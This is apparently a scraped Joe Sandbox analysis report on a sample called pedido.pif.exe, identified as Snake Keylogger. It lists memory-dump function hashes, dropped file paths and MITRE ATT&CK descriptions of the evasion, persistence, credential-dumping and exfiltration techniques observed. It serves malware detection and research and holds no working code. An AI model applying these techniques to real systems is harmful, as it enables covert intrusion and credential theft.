Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 45C08C3324C1282AE636108F7C40EB3BB8CE3C13F4A250137F91CE3300A8429C8041F8

Function 0293A70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3874399106.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2930000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be1acecf2c536dad561c5d851257d844eb966c311203380b65e845a8e8f56300
Instruction ID: de7fe4444e565b733e9f023dfb907ee705fbdc43089c82b1cfc453f5c2f0b3c6
Opcode Fuzzy Hash: be1acecf2c536dad561c5d851257d844eb966c311203380b65e845a8e8f56300
Instruction Fuzzy Hash: 77D0677BB011089FCB049F99E8409DDB7B6FB9C222B048116E915A7260C6359961DB60

Function 02935EA8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3874399106.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2930000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c559831c800bb1605347d1f7ad9b2a4ec9fe0c869c5afcc835d17261b6ffac1
Instruction ID: 6985c4b8fe81dd752bcf3f98d883ce91e4b39b4fbbe0b72e3ea211c8fcc6855e
Opcode Fuzzy Hash: 7c559831c800bb1605347d1f7ad9b2a4ec9fe0c869c5afcc835d17261b6ffac1
Instruction Fuzzy Hash: F2D05E709183464FD716F770F9540243B22BAD1A08B8081E9E80A0E51AEE7A8D4787A2

Function 06731CA1 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3882000599.0000000006730000.00000040.00000800.00020000.00000000.sdmp, Offset: 06730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6730000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e85430c6ab283fe7764037e6ca8f43c4de1959f8503a6fdfb8a05522354ab9
Instruction ID: 28be6ed48d978f13181e2dda4f6107c0a464d52a78e270ec4432ff8cb3910d72
Opcode Fuzzy Hash: d0e85430c6ab283fe7764037e6ca8f43c4de1959f8503a6fdfb8a05522354ab9
Instruction Fuzzy Hash: E4C012A450A2828FCF4BE7A035940183FA1EA971367E186A2D80ACA013F0042A9A8662

Function 02935EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.3874399106.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_2930000_RePUtenbQjvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bc09d1f4db650813f81dc4f567e1a2c42175705f855f0c6c072b6aec99cc246
Instruction ID: 22a330e955a0ba66ad7f086d87b3440ec318bd9b5b8ff07e6ccd5f19250a2dd9
Opcode Fuzzy Hash: 7bc09d1f4db650813f81dc4f567e1a2c42175705f855f0c6c072b6aec99cc246
Instruction Fuzzy Hash: 2DC0803052030D8FD50AF775F944515371BF6C0705F40C554F40B0A11DDF795C4547A1

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pedido.pif.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RePUtenbQjvc.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pedido.pif.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvmt2kas.5om.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hz05ajlc.1vs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixbhlrkp.knb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_usx2df0q.5l5.psm1

C:\Users\user\AppData\Local\Temp\tmp30EC.tmp

C:\Users\user\AppData\Local\Temp\tmp4B59.tmp

C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe:Zone.Identifier

Static File Info

Windows Analysis Report
pedido.pif.exe

Function 0D6A79D0 Relevance: 6.9, Strings: 5, Instructions: 680
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre